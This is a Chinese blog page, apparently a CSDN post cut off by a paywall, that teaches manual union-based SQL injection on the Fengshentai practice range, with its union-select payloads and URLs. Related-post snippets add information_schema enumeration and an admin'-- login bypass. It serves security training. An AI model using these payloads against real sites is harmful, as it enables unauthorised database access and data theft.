sql简单注入-------基本步骤

最新推荐文章于 2024-03-17 12:15:00 发布
VIP文章 最新推荐文章于 2024-03-17 12:15:00 发布
阅读量1.2k 收藏 1
点赞数 4
分类专栏: 网络安全 文章标签: sql注入原理 防止sql注入 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoduanDDG/article/details/102763651
版权

本题用封神台靶场,第一道拯救女神小芳-猫舍的题作为例子

1.判断与数据库交互的地方是否存在注入点

方法:加入单引号' 使数据库报错,说明存在注入点

2.判断字段数

用order by 或者group by

59.63.200.79:8003/?id=1 order by 1    //如果不报错则至少要有一个字段,进行第二个测试,直到报错为止

59.63.200.79:8003/?id=1 order by  3  //如果3 报错,证明有2个字段

3.查找回显点

59.63.200.79:8003/?id=1 and 1=2 union select 1,2 from admin

//这里的1,2可以换成别的,只要保证有两个字段就可以,

//admin 是数据库的名称,可以用爆字段,爆表的方法查出来,具体自行百度

这时,在页面中就会出现相应的数字,就是我们要找的回显点,比如页面上出现数字2,我们就把2的位置改为我们想要知道的信息

4.找出信息

59.63.200.79:8003/?id=1 and 1=2 union select 1,database() from admin

这时,数据库的名称就会显示在原来显示2的位置上,

最低0.47元/天 解锁文章
李昭仪668
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
具有SQL注入漏洞的安全系统 抽象的 Web应用程序带来了新型的计算机安全漏洞,例如SQL注入。 这是一类基于输入验证的漏洞。 SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的...
signature=82aa6bdc91a0d1261157e2997e6d4bda,alasql/yarn-error.log at develop · agershun/alasql · GitH...
热门推荐
weixin_42365586的博客
05-30 4万+
Arguments:/Users/mrw/.nvm/versions/node/v12.14.0/bin/node /Users/mrw/.yarn/bin/yarn.js add ChiqqPATH:/Users/mrw/.wasmer/bin:/Users/mrw/.wasmer/globals/wapm_packages/.bin:/Users/mrw/.google-cloud-sdk/b...
封神台——手工注入基础(猫舍)
Zichel77的博客
07-04 7811
题目提示很明显,就是sql注入拿到管理员密码 点击传送门进入看到的是一个很简陋的猫舍页面 域名简单,没看到注入点http://59.63.200.79:8003/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标urlhttp://59.63.200.79:8003/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 .
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 1751
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
网络安全1-1
小开心的博客
03-23 948
声明:练习仅可在靶场,不可用于非法操作。 最近学习了一下网络安全的入门的相关操作,无意中找到了一个叫做封神台的靶场,搭配里边的教程学习了一下,感觉还是不错的,虽然大学学习了一些关于密码学的知识,在实际操作时,还是有一定的难度,初学者,经验能力还不够,写一篇文章记录一下。 第一章 辛巴猫舍(简单sql注入) 点击查看新闻1 1、检测一下是否有sql注入点 http://117.1...
封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 673
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
SQL注入总结
qq_46081990的博客
04-22 2901
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
Pangolin-v2.3.2.952
04-06
Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。 所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至...
Oracle Stream-安装配置
09-01
从技术实现思路上与streams几无相同之处,倒是逻辑standby与streams的实现方式非常想像,都是通过分析 redo生成重做的sql语句在目标端执行,如果要说差异的话,逻辑standby只提供了整库级的复制,从功能上来看...
SXU-网络攻防第六次作业-sql注入进阶
12-27
山西大学网络攻防第六次作业——sql注入进阶 把test靶场中的报错注入,时间注入,堆叠注入,宽子节注入进行练习.这四个注入在127.0.0.1/test/sql/路径下﹒按破解步骤进行,至少做到爆表名这一步﹒每个步骤都要按考试...
MR.SE SQL Injection Tool:MR.SE编码的自动SQL注入工具-开源
05-15
SQLInjection是黑客基础知识之一。 这也是最繁琐和最耗时的步骤之一。 在Perl和黑客的帮助下编写的MR.SE SQL注入工具可以借此快速轻松地渗透其所需的网站数据库。
sql注入漏洞测试2(初级篇)--为了女神小芳^o^
waxcj的博客
04-04 3639
今天的的靶场是来自封神台的一个sql注入靶场,图片如下 点击进入传送门,结果如下图所示,先观察网站的url,查看是否有sql注入特征的信息,结果发现没有什么有用信息,但是图片下面有一个超链接,点进去看看! 进去之后看到了网站的url有我们想要的信息——“?id=1”,这时候我们就可以去试试是否存在sql注入漏洞存在。 首先还是使用sqlmap(sqlmap对于新手来说是一款很好用的sql注入软件),进入sqlmap,将要测试网站的url输入进去 不测不知道,一测就发现了有两个注入..
SQL注入详解(全网最全,万字长文)
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
sql注入详解
m0_67392811的博客
06-12 5370
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
【网络安全】SQL注入详解
2301_77160226的博客
04-27 2503
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
sql注入实战(一)
whiteso的博客
01-19 730
实例靶场 http://59.63.200.79:8003/ http://59.63.200.79:8003/?id=1 and 1=1 order by 3 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database() http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_sc
注入(一)
tomyyyyy
06-28 266
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
SQL注入详解
qq_48904485的博客
03-21 1万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
简单sql注入入门
d2231300271的博客
03-24 374
基本流程是:观察注入点->判断参数类型-->判断列数(group by或order by)-->观察是否存在显示位(就是页面能够显示列数据的位置(实践理解)),语法报错,异常页面显示(根据不同情况选择不同的注入方式)-->根据不同的注入方式依次显示库,列,表。当前99%以上的MySQL版本都是5.0以上,都支information_schema 库(),所以我们会使用该库进行爆数据库-->爆数据表--爆数据列-->爆数据(类似于根据目录查页数然后翻到相对于的位置)字段表示的是数据库中所有的字段信息。
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名和密码,点击登录按钮。 2. 在浏览器中按F12打开开发者工具,切换到Network选项卡。 3. 再次点击登录按钮,查看POST请求的数据包。 4. 将POST请求的数据包复制到Burp Suite等代理工具中。 5. 在代理工具中修改用户名为:admin'--,密码随意填写。 6. 发送修改后的数据包,即可成功登录管理员账户。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值